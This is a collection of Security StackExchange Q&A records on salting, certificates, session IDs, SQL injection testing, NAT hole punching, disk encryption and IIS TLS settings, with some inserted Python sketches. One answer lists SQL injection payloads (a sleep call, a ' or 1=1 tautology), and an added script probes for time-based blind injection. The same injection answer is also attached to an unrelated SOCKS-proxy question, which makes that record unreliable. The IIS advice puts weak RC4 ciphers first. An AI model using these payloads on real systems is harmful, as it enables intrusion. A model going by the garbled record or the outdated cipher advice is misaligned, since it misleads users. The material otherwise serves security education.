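    for key, value in sorted(read_environ(pid).items()):
        print("%s=%s" % (key, value))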
14,025 | Storing the hash of users' passwords, e.g. in a database, is insecure since human passwords are vulnerable to dictionary attacks. Everyone suggests that this is mitigated via the use of salts, but the salt is considered non-sensitive and does not need to be protected. In the event that the attacker has the salt how has his dictionary attack become more difficult than before? Does not having access to the salt, effectively, remove its usefulness? | Salt doesn't protect you against a lone attacker who is only after one password. An attacker who just wants to break one password will calculate hash(salt + guess) instead of hash(guess) (if the password scheme is hash(salt+password) ). Salt helps if the attacker wants to break many passwords. This is usually the case. Sometimes the attacker is attacking a site and wants to break into an account on that site, any account. Without a salt, most of the attacker's work can be used for all accounts, so she can test each of her attempts against all accounts at once. With a correctly-chosen salt (i.e. if no two accounts have the same salt), the attacker has to start over for each hashed password. Furthermore, in a sense, all password cracking attempts are attempting to crack all accounts passwords at once. That's because hashes can be precomputed; all it takes is for someone to generate a table of hashes — or more efficiently, a rainbow table — and that initial work can be distributed to multiple attackers who can use it on any account database that uses the same password hashing algorithm. Again, salt makes these precomputations useless. A brute-force password attack can be summarized like this: Make any precomputation that the attacker deems useful, such as building a rainbow table (which is an efficient way to represent a table mapping hashes to common passwords). For every one of the n accounts that the attacker is interested in breaking in, and for every one of the p password guesses that the attacker includes in her dictionary, test whether hash(guess[i]) = hashed_password[j] . In a naive approach, the second step requires n × p hash computations to try all guesses against all accounts. However, if the first step already calculated all the possible hashes, then the second step requires no hash computation at all, just testing whether each hashed_password is in the precomputed database, so the attack requires just n table lookups (this can even be sped up, but we've already gone from n x p slow computations¹ down to n table lookups). If each password has a different salt, then in order to be helpful, the precomputation would have to include an entry for every possible salt value. If the salt is large enough, the precomputation is infeasible. If the precomputation doesn't take the salt into account, it won't be useful to speed up the second step, because any cryptographic hash function “mixes” its input: knowing the hash of UIOQWHHXpassword doesn't help compute the hash of NUIASZNApassword . Even to attack a single account, the attacker needs to perform p hash computations to try all guesses, already an improvement on the single table lookup that would be sufficient if the attacker has a precomputed dictionary. ¹ A password should not be stored as a hash such as SHA-1, but using a slower hash function such as bcrypt or scrypt or PBKDF2 . | {
"source": [
"https://security.stackexchange.com/questions/14025",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2583/"
]
} |
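As a concrete illustration of the answer above (an editorial sketch, not part of the original answer): per-account random salts combined with a deliberately slow hash, using only Python's standard library. The iteration count is an assumption for illustration; choose it according to current PBKDF2 guidance.

# Minimal sketch: store a per-user random salt plus a slow PBKDF2 hash, never a bare fast hash(password).
import os, hashlib, hmac

ITERATIONS = 600_000   # illustrative value; tune to your hardware and current guidance

def hash_password(password):
    salt = os.urandom(16)                                    # unique per account, stored with the hash
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, stored):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)             # constant-time comparison

# Because every account has its own salt, a precomputed table of hash(guess) values
# (e.g. a rainbow table) is useless: the attacker must redo the work per account and per guess.
salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))   # True
print(verify_password("wrong guess", salt, stored))                    # False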
14,043 | In X.509 architecture, what are the uses of cross-signing certificates from another hierarchy? Does it just expand trust? So from the answer I am assuming that if CA3 is cross-signed by CA2 (from another hierarchy) and CA1 (a parent in its own hierarchy), whose private key is used to encrypt the authentication hash in the certificate of CA3? | It's about expanding trust, yes. If you trust both CA1 and CA2, and a cert is signed by both, you've got a very high level of trust because two separate entities that you trust have verified the cert. It has the added bonus of increasing the ease of verification of trust, such as situations where you've got clients that trust CA1 or CA2 (but not both). In such a case, you can cross-sign a cert to be trusted by both. This allows more clients to verify trust without having to distribute separate certs for different CAs. Another bonus is in situations where a CA's private key is leaked. Let's say CA1's key leaks and your cert is signed by CA1 and CA2. In the wake of the leak, CA1 issues a revocation for its public key and you can no longer trust anything issued by CA1. However, since your cert is cross-signed to CA2 as well, any client that trusts CA2 can still maintain a level of trust in your cert. | {
"source": [
"https://security.stackexchange.com/questions/14043",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9224/"
]
} |
14,068 | Isn't 128-bit security enough for most practical applications? | Why do people buy red sports cars? They do not go faster than sports cars of any other colour... AES comes with three standard key sizes (128, 192 and 256 bits). Many people see this and think that if there are three distinct sizes instead of just one, then there must be some difference, and since the 256-bit version is a bit slower than the 128-bit version (by about 40%), it must be "more secure". So they go for "the most secure" and choose 256-bit keys. In reality, the AES has three distinct key sizes because it has been chosen as a US federal algorithm apt at being used in various areas under the control of the US federal government, and that includes the US Army. The US Army has a long-standing Tradition of using cryptography, and that Tradition crystallized into internal regulation with all the flexibility and subtlety that armies around the world constantly demonstrate (just listen to some "military music" and you'll understand what I mean). Unfortunately, this happened quite some time ago, before the invention of the computer, and at that time most encryption systems could be broken, and the more robust ones were also very hard and slow to use. So the fine military brains came up with the idea that there should be three "security levels", so that the most important secrets were encrypted with the heavy methods that they deserved, but the data of lower tactical value could be encrypted with more practical, if weaker, algorithms. These regulations thus called for three distinct levels. Their designers just assumed that the lower levels were necessarily weak in some way, but weakness was not mandatory. So the NIST decided to formally follow the regulations (ask for three key sizes) but to also do the smart thing (the lowest level had to be unbreakable with foreseeable technology). 128 bits are quite sufficient for security (see this answer for details). Therefore AES accepts 256-bit keys because of bureaucratic lassitude: it was easier to demand something slightly nonsensical (a key size overkill) than to amend military regulations. Most people don't know or don't care about History, and they just go for big because they feel they deserve it. | {
"source": [
"https://security.stackexchange.com/questions/14068",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8729/"
]
} |
14,093 | I recently followed a discussion, where one person was stating that passing the session id as url parameter is insecure and that cookies should be used instead. The other person said the opposite and argued that Paypal, for example, is passing the session id as url parameter because of security reasons. Is passing the session id as url parameter really insecure? Why are cookies more secure?
What possibilities does an attacker have for both options (cookies and url parameter)? | Is passing the session id as url parameter really insecure? While it's not inherently insecure, it can be a problem unless the code is very well-designed. Let's say I visit my favorite forum. It logs me in and appends my session ID to the URL in every request. I find a particularly interesting topic, and copy & paste the URL into an instant message to my friend. Unless the application has taken steps to ensure that there's some form of validation on the session ID, the friend that clicked that link may inherit my session, and then would be able to do anything I can do, as me. By storing session identifiers in cookies, you completely eliminate the link sharing problem. There's a variation on this theme called session fixation , which involves an intentional sharing of a session identifier for malicious purposes. The linked Wikipedia article goes into depth about how this attack works and how it differs from unintentional sharing of the session identifier. Why are cookies more secure? Cookies can be more secure here, because they aren't something that normal users can copy & paste, or even view and modify. They're a much safer default. What possibilities does an attacker have for both options? Neither of these methods is secure from man-in-the-middle attacks over unencrypted communication. Browser addons, spyware and other client-side nasties can also spy on both methods of storing session identifiers. In both cases, server-side validation that the client that claims to own a session ID is best practice. What this validation is composed of is up for debate. Keep in mind that users behind corporate proxies may hop between IP addresses between requests, so locking a session to an IP address may accidentally alienate people. The session fixation article mentions a few other helpful alternatives. | {
"source": [
"https://security.stackexchange.com/questions/14093",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9294/"
]
} |
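As a small illustration of the cookie-based recommendation in the answer above (an editorial sketch, not from the original answer): generate an unguessable session identifier server-side and hand it out as a cookie whose attributes keep it out of URLs and scripts. The attribute values shown are reasonable defaults rather than a universal prescription, the SameSite attribute assumes Python 3.8 or later, and real applications would normally rely on their framework's session support.

# Minimal sketch: issue the session ID as a hardened cookie instead of a URL parameter.
import secrets
from http import cookies

session_id = secrets.token_urlsafe(32)     # unguessable, generated server-side

jar = cookies.SimpleCookie()
jar["session"] = session_id
jar["session"]["httponly"] = True          # not readable from JavaScript
jar["session"]["secure"] = True            # only sent over HTTPS
jar["session"]["samesite"] = "Lax"         # not attached to most cross-site requests (Python 3.8+)
jar["session"]["path"] = "/"

# This is the header a server would emit. Nothing session-related appears in the URL,
# so a copy-pasted link can no longer hand the session to someone else.
print(jar.output())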
14,142 | What methods are available for testing SQL injection vulnerabilities? | There are a number of ways of testing an application for vulnerabilities such as SQL Injection. The tests break down into three different methodologies: Blind Injection : MySQL example: http://localhost/test.php?id=sleep(30) If this SQL statement is interpreted by the database then it will take 30 seconds for the page to load. Error Messages: http://localhost/test.php?id='" If error reporting is enabled and this request is vulnerable to sql injection then the following error will be produced: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '"' at line 5 Tautology Based Injection : http://localhost/test.php?username=' or 1=1 /*&password=1 In this case supplying a Tautology , or a statement that is always true provides a predictable result. In this case the predictable result would be logging in the attacker with the first user in the database, which is commonly the administrator. There are tools that automate the use of the methods above to detect SQL Injection in a web application. There are free and open source tools such as Wapiti and Skipfish that do this. Sitewatch provides a free service that is a lot better than these open source tools. I can say that because I am a developer for Sitewatch. | {
"source": [
"https://security.stackexchange.com/questions/14142",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9339/"
]
} |
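A hedged sketch of the time-based blind test described in the answer above (an editorial addition, not part of the original answer): issue the same request with and without a sleep payload and compare response times. The URL and parameter are placeholders, the payload assumes a MySQL back end, the snippet uses the third-party requests library, and it should only ever be pointed at systems you are authorised to test.

# Minimal sketch of a time-based blind SQL injection probe (authorised testing only).
# TARGET and the "id" parameter are placeholders for illustration.
import time
import requests

TARGET = "http://localhost/test.php"
DELAY = 5   # seconds the payload asks the database to sleep

def timed_get(params):
    start = time.monotonic()
    requests.get(TARGET, params=params, timeout=DELAY + 10)
    return time.monotonic() - start

baseline = timed_get({"id": "1"})
probe = timed_get({"id": "1 AND sleep(%d)" % DELAY})   # MySQL-style payload

print("baseline %.2fs, probe %.2fs" % (baseline, probe))
if probe - baseline > DELAY * 0.8:
    print("Response delayed by roughly the sleep time: the parameter looks injectable.")
else:
    print("No significant delay observed (which is not proof the parameter is safe).")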
14,147 | I was using a socks proxy to access websites blocked by my ISP, now it don't work any more in an strange way. Using the proxy is same as not using it! (i.e. I can access open sites but filtered sites are filtered even through proxy.) I want to know what can case this? And is there any way to make a secure tunnel other than ssh? | There are a number of ways of testing an application for vulnerabilities such as SQL Injection. The tests break down into three different methodologies: Blind Injection : MySQL example: http://localhost/test.php?id=sleep(30) If this SQL statement is interpreted by the database then it will take 30 seconds for the page to load. Error Messages: http://localhost/test.php?id='" If error reporting is enabled and this request is vulnerable to sql injection then the following error will be produced: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '"' at line 5 Tautology Based Injection : http://localhost/test.php?username=' or 1=1 /*&password=1 In this case supplying a Tautology , or a statement that is always true provides a predictable result. In this case the predictable result would be logging in the attacker with the first user in the database, which is commonly the administrator. There are tools that automate the use of the methods above to detect SQL Injection in a web application. There are free and open source tools such as Wapiti and Skipfish that do this. Sitewatch provides a free service that is a lot better than these open source tools. I can say that because I am a developer for Sitewatch. | {
"source": [
"https://security.stackexchange.com/questions/14147",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9343/"
]
} |
14,227 | How would I set up a multiboot system which supports full hard drive encryption and pre-boot authentication. I have a system with Ubuntu, Windows 7, Windows XP, and I would like to install Red Hat. I use grub 2 boot loader. What software would support this set up, for full drive encryption with pre-boot authentication? There is TrueCrypt for Windows pre-boot authentication, but will it play nice with grub 2? What other disk encryption software could I use for Linux side? | Before you read all this, remember that this technique is at least 5 years old -- it's probably much easier by now (see the other answers). (But it sure was fun to figure this all out.) I did this a few years ago with Fedora 10 and Windows Vista to demonstrate how all the intricacies fit together. It was a bit involved (mostly because Windows Vista doesn't "play well with others" and doesn't like being installed second), but in the end I found a method that suited me. Your case is more complex because you have 3 existing OS'es and you want to add another onto your drive. Because I've never attempted this on the magnitude of 4 operating systems, I'll leave most of it up to you (the actual re-partitioning and such) and will try to take the general security principles from my experience and apply them to your situation. Also note that in my case, I started from scratch on a drive I had erased. This was more an experiment than an expert exposé... so take a few things with a grain of "salt" (no pun intended) and don't hold me responsible. :) Remember, these are just my notes. You will have to adjust them for your situation. So here we go: Problems overcome by the method described here My notebook’s hard disk could only contain 4 primary partitions. Primary partitions are the only ones that OSes can be installed to (Windows, anyway). Primary partitions are the only partitions the system can boot from Each extended partition counts as a primary partition. 6 or 7 partitions may be needed. TrueCrypt can’t encrypt an entire drive that has multiple partitions, OSes, and various file systems when it only runs on one TrueCrypt doesn’t play well with Grub or any non-Windows boot loader. Windows likes to be installed first and only on a partition flagged as “bootable” (or, if no partitions are flagged “bootable” at all) Benefits in the end After the initial boot loader prompt, mounting various encrypted partitions could be automated with scripts. (<3 Truecrypt) Files can be shared between encrypted operating systems (with password). Each and every partition is encrypted, even swap file. How the boot loaders work together We install and use Windows’ default boot loader to the MBR. This is what the computer will boot to first. We install GRUB (Fedora’s boot loader), but not to the MBR. This will merely be available for us to boot to later. We install TrueCrypt which takes over the Windows boot loader. TrueCrypt’s boot loader goes into the MBR. On boot, the user will authenticate with TrueCrypt then be taken to the Windows boot loader where the option Vista or Linux (actually GRUB) becomes available. In the end, my boot process looked like this: Diagram of full-disk encrypted dual-boot process (yellow boxes are encrypted partitions; padlocks are another layer of security) Possible adjustments for your situation I didn't use Truecrypt on the Linux side except to mount the Windows partitions. I'm not sure how to mount native Linux-encrypted partitions from Windows, so my setup was rather one-way. 
You might consider using Truecrypt to encrypt at least your Linux /home directory and let native Linux encryption protect the /swap partition, for example. This might allow Truecrypt on the Windows side to mount your Linux files. Re-partition your hard drive in-place, or add another drive for Red Hat. The folks over at SuperUser probably know more about this. Figure out how you're going to partition your hard drive ahead of time... you don't need as many partitions as I used. Requirements A computer with at least one hard disk you are willing to wipe clean (Back up your data first, of course...) Installation discs of the OSes you wish to install Gparted LiveCD or LiveUSB TrueCrypt EasyBCD to modify the Windows boot loader (There's a free version...) Instructions Back up your data. You are going to wipe the hard disk totally clean and reformat it very soon. Reformat the entire drive. To do this, I use Gparted LiveCD. If you don’t want to use Gparted, Fedora 10’s installer comes with a partition editor. But, it’s a bit trickier. You’ll have to partially complete the Fedora setup in order to get to it, apply the changes to the disk, then exit setup because Fedora shouldn’t be installed first. (Windows Vista’s partition editor is NOT powerful enough. You cannot use it for this.) I strongly encourage the use of a Gparted LiveCD or LiveUSB. I thought about how to split up my drive and after a while, I came up with this: Partition layout for dual booting Fedora 10 and Windows Vista with TrueCrypt I wish I had sized them differently in hindsight, but you can do it however you want. Each padlock indicates an encrypted partition. The yellow padlocks with “TC” are encrypted with TrueCrypt in Windows. The blue ones are encrypted by Fedora. As you can see, each and every partition - except, of course, the /boot partition - is encrypted. Partitions labeled in red are for Windows. Black is for Linux. Okay, so this is a setup that works for me. Basically, you’ll want these things: A primary boot partition to put Grub (the boot loader Fedora can install for you) - I recommend about 50 to 100 megabytes. Do not flag this as “bootable” when partitioning - Windows will complain. An extended partition to hold all the “data” or “miscellaneous” partitions. This will hold your Fedora /home directory (basically the “My Documents” folder of Linux), Windows backup partition (optional), and your Linux swap file (highly recommended). The swap file should be at least as large as your RAM’s capacity. A primary partition for Windows Vista to be installed to. A primary partition for Fedora 10 to be installed to. Partition your drive as such and be sure to format with the appropriate file systems. You can use the table above as reference. Write down the sizes of your partitions (in order) and their filesystem. You'll need this during the OS installs. Start installing Windows Vista. You’ll be forced to do a custom installation. Choose the primary NTFS partition you reserved for the Windows install. Don’t forget to load hard disk drivers - especially on laptops. If your Windows install hangs around 70%, then you need to install the SATA drivers for your laptop. Once drivers are loaded and you select the right partition, install Windows. After Windows installs, boot into it normally and finish setup. Don’t spend too much time customizing things yet. Once it is running, shut down and insert the Fedora 10 DVD. Boot to that and install Fedora. 
However, take note of the following: Be sure you choose to do a custom layout for your partitioning. Fedora will want to wipe things and create its preferred partition layout by default. Don’t let it do this. Make sure you go straight to the part where you can view and modify your current partition information. Don’t format the NTFS partitions. Windows is on one of them. Be sure to set the mount point for the small partition (100 MB?) to be /boot. -Check “Format as” and select “ext3.” You cannot encrypt this partition. Set the mount point for the partition for your /home directory to… you guessed it: /home. Check “Format as ” and select “ext3″ then choose the “Encrypt” option. Set the mount point for the partition for your swap file as /swap. Linux will have to format it and you should, of course, select “Encrypt.” Set the mount point for the partition for your main Fedora install to be “/”. Check “Format as” and select “ext3″ then choose the “Encrypt” option. Before continuing, ensure that neither of the NTFS partitions have a check mark next to them. If they do, they will be formatted and you’ll have to start over. Continue. Fedora will warn you it will delete all the data on the modified partitions. That’s okay. You may have to set your passwords now as well. Go ahead and do that. Soon it will ask you about the boot loader. Tread carefully here. Do not write the GRUB boot loader to the MBR. When it says “Install the boot loader on/dev/sda1″ (the “sda1″ may be different) - keep the box checked but click “Change Device” and choose “first sector of boot partition” instead. After that step, you should be home free. Finish up the install and reboot the computer. It will boot straight into Windows. Once Windows loads, download and install EasyBCD. You’ll want it to easily modify the Windows boot loader. Add an entry to the boot loader: click “Add/Remove Entries” - choose the “Linux” tab, select “GRUB” from the dropdown, and name it something intelligent. Choose the partition that contains GRUB, not Fedora. Leave the checkbox unchecked. Add the entry then try rebooting. You should now be able to boot into either Fedora or Windows! Boot into Windows again and encrypt it, as follows: Install TrueCrypt and create a new volume. Choose “Encrypt the system partition or entire system drive.” From this point, you’ll have to choose the proper options. Read them carefully! I don’t remember the exact sequence, but you need to specify “Multi-boot” at some point. At the end it will ask whether Windows has its boot loader in the MBR or if a different boot loader is used (like GRUB). Remember: we're using the Windows’ boot loader (we want Truecrypt to "overtake" it). Once you’ve finished the volume creation wizard, you’ll be asked to “Test” the system. It will restart for you. It should boot into the TrueCrypt boot loader where you’ll type your password. After that, it should load the Windows boot loader where you can boot into either Linux or Windows. From here, finish encrypting the Windows system partition, then remember to encrypt any other NTFS partitions you made for Windows. When you’re done, try booting into Linux. It should go to the GRUB boot menu where you can select Fedora or change your mind and go back to Windows. As Fedora boots, you’ll be asked for your password as it mounts the encrypted partitions. Tl; dr (Too long; didn't read) It took me a few tries to get it right with two OSes, and employed the use of software like EasyBCD, Truecrypt, and Gparted, but I was successful in the end... 
for 2 OSes. Good luck with 4. The key is to plan effectively. Size and format your partitions properly, then install operating systems in the correct order. (Usually Windows goes first.) PS. Hm, For a simpler solution, though not quite what you asked for: have you considered running 3 of the 4 operating systems in virtual machines? You can encrypt the host machine, thus protecting the other 3 at the same time. (And if you're worried about losing the VHD files, remember you can fully encrypt the guest OSes, too.) | {
"source": [
"https://security.stackexchange.com/questions/14227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5715/"
]
} |
14,280 | I am wondering how is it possible for Team Viewer to establish the remote desktop connection over the internet even if the user has not enabled the 3389 port ? I am searching over the internet but didn't find the satisfied answer to my question ? How does it even possible to establish RDP over the internet since it is only possible across the network ? Does Team Viewer use Reverse Connection technique ?
Is it possible to establish the RDP connection with someone who is outside the network? | To elaborate on ewanm89's post, TeamViewer does use UDP pinholing (hole punching). UDP is a stateless protocol. This means packets are fired off at their target with no verification (at the protocol level) that they were received or even reached the destination. Firewalls are designed to look for UDP packets and record the source and destination as well as the timestamp. If they see an inbound packet that matches an outbound packet, they will generally allow the packet through even without a specific rule being placed in the firewall's access list. This can be locked down on enterprise-grade devices, but in general 90% of the firewalls out there will allow return traffic. In order to punch the hole, your machine (the viewer) has a TCP connection back to the main TeamViewer server. The target machine (the client) also has a TCP connection to the main TeamViewer server. When you hit connect, your machine tells the main server its intention. The main server then gives you the IP address of the client machine. Your machine then begins firing UDP packets at the client. The client is signaled that you intend to connect and is given your IP. The client also starts firing UDP packets at you. If the firewalls are "P2P-friendly", this causes both firewalls (yours and the client's) to allow the traffic, thus "punching holes" in the firewall. Specifically, this requires the firewalls to not change the public port of an outbound packet merely because its destination has changed; the firewall must reuse the same public port as long as the source of the packet hasn't changed. If your firewalls don't behave in such a friendly manner, then this won't work. Many firewalls do behave this way, though. Of course TeamViewer adds some security by doing a PIN/password check before the main server sends the IP info to both parties, but you get the idea. (A minimal hole-punching sketch in code follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/14280",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9417/"
]
} |
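To make the hole-punching description above concrete, here is a heavily simplified editorial sketch (an illustration only, not TeamViewer's actual protocol). It assumes each peer has already learned the other's public IP and port, which is the job the rendezvous server does; the address below is a placeholder, and a mirror-image copy runs on the other peer.

# Minimal UDP hole-punching sketch for one peer (run the same thing on the other side,
# pointed back at this host). PEER is a placeholder address learned out of band.
import socket, time

LOCAL_PORT = 40000
PEER = ("203.0.113.10", 40000)   # placeholder public address of the other peer

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", LOCAL_PORT))
sock.settimeout(1.0)

for attempt in range(30):
    # Each outbound packet creates state in our own NAT/firewall, so packets coming
    # back from the same remote address/port pair are allowed in.
    sock.sendto(b"punch", PEER)
    try:
        data, addr = sock.recvfrom(1024)
        print("hole punched: received %r from %s:%d" % (data, addr[0], addr[1]))
        break
    except socket.timeout:
        time.sleep(0.5)
else:
    print("no reply; at least one of the NATs is probably not P2P-friendly")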
14,326 | As you can see on this post TeamMentor.net vulnerable to BEAST and SSL 2.0, now what? the app I'm currently development got flagged for SSL 2.0 and BEAST by SSL Labs. I'm using IIS 7.0 with the latest patches, and can't seem to find the answers to these questions: What is the risk impact of this vulnerability on a site like http://teammentor.net ? What are the exploit scenarios? Is there any mitigation (or not) by the use of IIS 7.0? How do I fix this in IIS 7.0? Can anything been done at the Application Layer? For reference here are a couple other security.stackexchange.com questions on this topic: Next Microsoft Patch Tuesday include BEAST SSL fix Should I ignore the BEAST SSL exploit and continue to prefer AES? What ciphers should I use in my web server after I configure my SSL certificate? | In IIS 7 (and 7.5), there are two things to do: Navigate to: Start > 'gpedit.msc' > Computer Configuration > Admin Templates > Network > SSL Configuration Settings > SSL Cipher Suite Order (in right pane, double click to open). There, copy and paste the following (entries are separated by a single comma, make sure there's no line wrapping): TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_RC4_128_MD5,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P521,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P521,TLS_RSA_WITH_AES_128_CBC_SHA256,TLS_RSA_WITH_AES_256_CBC_SHA256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P521,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P521,TLS_DHE_DSS_WITH_AES_128_CBC_SHA256,TLS_DHE_DSS_WITH_AES_256_CBC_SHA256,TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA_P256 Run the following PowerShell commands as administrator (copy-paste into Notepad, save as 'fix-beast-in-iis.ps1' and run with elevated privileges): #make TSL 1.2 protocol reg keys
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client"
# Enable TLS 1.2 for client and server SCHANNEL communications
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
# Make and Enable TLS 1.1 for client and server SCHANNEL communications
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
# Disable SSL 2.0 (PCI Compliance)
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -name Enabled -value 0 -PropertyType "DWord" Once you've run the script, you can run 'regedit' and make sure the keys in the script were actually created correctly. Then reboot for the change to take effect. WARNING: Notice I didn't turn off SSL 3.0- the reason for this is due to the fact that, like it or not, there are still people out there using Windows XP with IE 6/7. Without SSL 3.0 enabled, there would be no protocol for those people to fall back on. While you may still not get a perfect on a Qualys SSL Labs scan, the majority of holes should be closed by following the previous steps. If you want absolute PCI compliance, you can copy the lines from the Disable SSL 2.0 section of the Powershell script, paste them at the end of the script and change them to the following: # Disable SSL 3.0 (PCI Compliance)
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server" -name Enabled -value 0 -PropertyType "DWord" Then, when you run the script, you disable SSL 2.0, SSL 3.0 and enable TLS 1.1 and 1.2. | {
"source": [
"https://security.stackexchange.com/questions/14326",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7507/"
]
} |
14,330 | In an X.509 digital certificate there is a "certificate fingerprint" section. It contains md5, sha1 and sha256. How are these obtained, and during the SSL connection, how are these values checked for? | The fingerprint, as displayed in the Fingerprints section when looking at a certificate with Firefox, or the thumbprint in IE, is the hash of the entire certificate in DER form. If your certificate is in PEM format, convert it to DER with OpenSSL: openssl x509 -in cert.crt -outform DER -out cert.cer Then, perform a SHA-1 hash on it (e.g. with sha1sum): sha1sum cert.cer This should produce the same result as what you see in the browser. These values are not part of the certificate; rather, they are computed from the certificate. One application of these fingerprints is to validate EV certificates. In this case, the SHA-1 fingerprint of the root EV CA certificate is hard-coded in the browser (note that (a) it's the fingerprint of the root cert and (b) it has to match exactly the trust anchors shipped with the version of the browser compiled with those values). Apart from this, these fingerprints are mostly used for identifying the certificates (for organising them). It's the actual public keys that are used for the verification of other certificates in the chain. The digest used for signing the certificate is actually not in the certificate (only the resulting signature). See certificate structure: Certificate ::= SEQUENCE {
tbsCertificate TBSCertificate,
signatureAlgorithm AlgorithmIdentifier,
signatureValue BIT STRING }
TBSCertificate ::= SEQUENCE {
version [0] EXPLICIT Version DEFAULT v1,
serialNumber CertificateSerialNumber,
signature AlgorithmIdentifier,
issuer Name,
validity Validity,
subject Name,
... In this case, the signature value is computed from the DER-encoded tbsCertificate (i.e. its content). When the signature algorithm is SHA-1 with RSA (for example), a SHA-1 digest is computed and then signed using the RSA private key of the issuer. This SHA-1 digest has nothing to do with the fingerprint as shown by openssl x509 -fingerprint or within the browser, since it's that of the tbsCertificate section only. There are also a couple of unrelated extensions that can make use of digests, this time of the public keys: the Subject Key Identifier and the Authority Key Identifier. These are optional (and within the TBS content of the certificate). (A short Python sketch of the fingerprint calculation follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/14330",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8201/"
]
} |
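A small sketch reproducing the fingerprint calculation from the answer above in Python rather than with openssl and sha1sum (an editorial addition). It assumes a DER-encoded file cert.cer produced by the openssl conversion shown in the answer.

# Minimal sketch: a certificate "fingerprint"/"thumbprint" is just a hash over the DER bytes.
import hashlib

with open("cert.cer", "rb") as f:      # DER-encoded certificate (see the openssl command above)
    der = f.read()

for algo in ("md5", "sha1", "sha256"):
    hexdigest = hashlib.new(algo, der).hexdigest().upper()
    # Print in the colon-separated form browsers usually display.
    print(algo.upper(), ":".join(hexdigest[i:i + 2] for i in range(0, len(hexdigest), 2)))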
